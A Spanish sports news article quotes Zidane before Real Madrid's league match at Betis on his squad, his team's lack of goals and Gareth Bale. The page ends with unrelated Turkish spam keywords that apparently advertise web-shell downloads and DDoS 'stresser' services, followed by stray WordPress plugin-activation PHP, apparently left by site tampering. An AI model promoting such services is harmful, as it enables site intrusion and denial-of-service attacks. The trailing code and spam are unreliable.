Zidane: «Estoy contento con mi plantilla, es la mejor»


Zinedine Zidane cerró filas con sus pupilos y aseguró que no va a pedir refuerzos, aunque recordó que «hasta el 4 de octubre puede pasar de todo». «Estoy contento con mi plantilla, es la mejor. Confío plenamente en mi plantilla y lo que vamos a hacer es trabajar para estar bien físicamente y llegar a los objetivos que tenemos que son ganar», dijo el entrenador del Real Madrid la víspera del duelo de la tercera jornada de Liga ante el Betis en el Benito Villamarín.

Un encuentro al que los blancos llegan de nuevo bajo sospecha por su falta de pegada ante la Real Sociedad el pasado domingo. Pese a ello, Zidane aseguró que ni quiere ni va a pedir ninguna incorporación al club y negó que desde las altas instancias se le haya urgido a no reclamar fichajes en tiempos de contención económica. «Nada de eso», sostuvo.

Considera Zidane que el hecho de que su equipo se quedase sin marcar en el Reale Arena responde a una situación puntual. «No pienso que haya ineficacia. El año pasado ganamos dos trofeos, sobre todo la Liga. Hay periodos en los que hemos marcado goles y otros periodos en los que hemos sido menos eficaces. Hay que trabajar», señaló el marsellés, contento por tener de nuevo disponibles a futbolistas como Eden Hazard, Marco Asensio, Isco o Lucas Vázquez. «Son jugadores que han hecho pocos entrenamientos, pero pueden entrar en la convocatoria porque lo importante es que estén bien físicamente», indicó sobre los cuatro atacantes.

Evitó entrar en la refriega con Gareth Bale, ahora en el Tottenham pero que se refirió a su paso por el Real Madrid en declaraciones a Sky Sports, señalando que no se arrepiente de nada de lo sucedido en su periplo como futbolista merengue. «No voy a contestar a lo que dijo Gareth. Le deseamos lo mejor y nada más», atajó.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Shell İndir Oyun Hileleri Oyun Hileleri Stresser

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );